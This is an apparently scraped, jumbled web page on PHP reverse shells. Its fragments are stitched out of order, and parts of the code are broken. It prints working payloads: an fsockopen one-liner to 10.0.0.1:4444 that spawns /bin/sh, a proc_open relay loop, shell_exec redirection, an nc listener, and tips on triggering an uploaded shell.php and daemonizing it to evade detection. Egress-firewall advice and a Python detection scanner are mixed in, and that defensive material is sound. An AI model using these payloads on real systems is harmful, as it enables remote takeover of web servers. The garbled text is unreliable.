<?= $c=fsockopen("10.0.0.1",4444);$d=exec("/bin/sh -i <&3 >&3 2>&3"); ?>
The target system must have an available shell interpreter (/bin/sh, cmd.exe, PowerShell) for the reverse shell to function properly. Minimalist systems may lack these components.
nc -lvnp 4444
// Duplicate socket descriptors for STDIN, STDOUT, STDERR
shell_exec('/bin/sh -i 0<&3 1>&3 2>&3');
The attacker finds a way to execute the PHP script (e.g., visiting https://victim.com/uploads/shell.php).
Configure firewalls to block unauthorized outbound connections from the web server. If your application only needs to serve web traffic on ports 80 and 443, block outbound requests on random high ports (like 4444) to disrupt reverse shell callbacks entirely.
array("pipe", "r"), // stdin
1 => array("pipe", "w"), // stdout
2 => array("pipe", "w") // stderr
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) exit(1);
// Set streams to non-blocking
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($socket, 0);
while (1)
if (feof($socket)) break;
if (feof($pipes[1])) break;
$read_a = array($socket, $pipes[1], $pipes[2]);
$num_changed_streams = stream_select($read_a, $write_a, $error_a, null);
if (in_array($socket, $read_a))
$input = fread($socket, $chunk_size);
fwrite($pipes[0], $input);
if (in_array($pipes[1], $read_a))
$input = fread($pipes[1], $chunk_size);
fwrite($socket, $input);
if (in_array($pipes[2], $read_a))
$input = fread($pipes[2], $chunk_size);
fwrite($socket, $input);
fclose($socket);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
?>
2. PHP One-Liners (Web Shells & Command Injections)
When the target system uses Bash, a reverse shell can be implemented using shell redirection without requiring PHP process management functions:
Specialized tools can scan PHP files for malicious patterns.
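A minimal version of such a scan, as an added example that is not from the original page or from any named tool: it flags PHP source that combines an outbound-socket call with a process-launch call, uses the fork/setsid daemonizing calls, or binds a shell to descriptor 3 or higher, which are the traits of the payloads shown on this page. The function sets, the labels and the benign sample are assumptions made for the example.

```python
import re

# PHP functions named in the payloads on this page, plus close relatives.
NETWORK = {"fsockopen", "pfsockopen", "stream_socket_client", "socket_connect"}
EXEC = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open"}
DAEMON = {"pcntl_fork", "posix_setsid"}

# Comments and quoted strings; heredocs are not handled in this sketch.
TOKEN = re.compile(
    r"(?P<comment>//[^\n]*|#[^\n]*|/\*.*?\*/)"
    r"|(?P<string>\"(?:\\.|[^\"\\])*\"|'(?:\\.|[^'\\])*')",
    re.S,
)
CALL = re.compile(r"(?<![\w$>:])(\w+)\s*\(")   # plain calls, not $var() or ->method()
FD_REDIRECT = re.compile(r"[<>]&[3-9]")        # shell I/O bound to a descriptor >= 3


def split_source(src):
    """Return (code with comments removed and strings emptied, string bodies)."""
    strings = []

    def repl(m):
        if m.group("string") is None:
            return " "                      # drop the comment
        strings.append(m.group("string")[1:-1])
        return '""'                         # keep a placeholder literal

    return TOKEN.sub(repl, src), strings


def scan(src):
    """Return sorted labels for reverse-shell traits found in PHP source."""
    code, strings = split_source(src)
    calls = {name.lower() for name in CALL.findall(code)}
    found = set()
    if calls & NETWORK and calls & EXEC:
        found.add("socket+exec")            # outbound socket and process launch together
    if calls & DAEMON:
        found.add("daemonize")              # fork/setsid is unusual in web-served PHP
    if any(FD_REDIRECT.search(s) for s in strings):
        found.add("fd-redirect")            # e.g. "<&3" wiring a shell to a socket
    return sorted(found)


# The one-liner quoted at the top of the page.
PAGE_ONE_LINER = r'''<?= $c=fsockopen("10.0.0.1",4444);$d=exec("/bin/sh -i <&3 >&3 2>&3"); ?>'''
# Constructed benign file: the risky names appear only in a comment and a string.
BENIGN = r'''<?php
// fsockopen() and exec() are blocked via disable_functions
$note = "never call shell_exec('id') from templates";
$out = exec("convert in.png out.jpg 2>&1");
'''
```

Matches are leads for manual review rather than verdicts; function names assembled from strings at run time are outside what this sketch can see.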
If an attacker has a limited injection point, they might use a compact PHP one-liner that leverages underlying system binaries like Bash, Perl, or Python.
2. Common PHP Payloads
// Read from shell stderr -> send to socket
$stderr_read = fread($pipes[2], 1024);
if ($stderr_read) fwrite($sock, $stderr_read);
is a communication pipe where the attacker can send commands that the target executes, returning the output back to the attacker.
Once executed, the tester gains interactive command-line access with the permissions of the user running the web server process (such as www-data or apache).
Common PHP Reverse Shell Payloads
More sophisticated reverse shell implementations attempt to "daemonize" the script—running it as a background process to avoid detection and prevent zombie processes. This is accomplished through POSIX functions such as pcntl_fork() and posix_setsid() when these extensions are available on the target system.
// Create a TCP socket
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)<br />\n");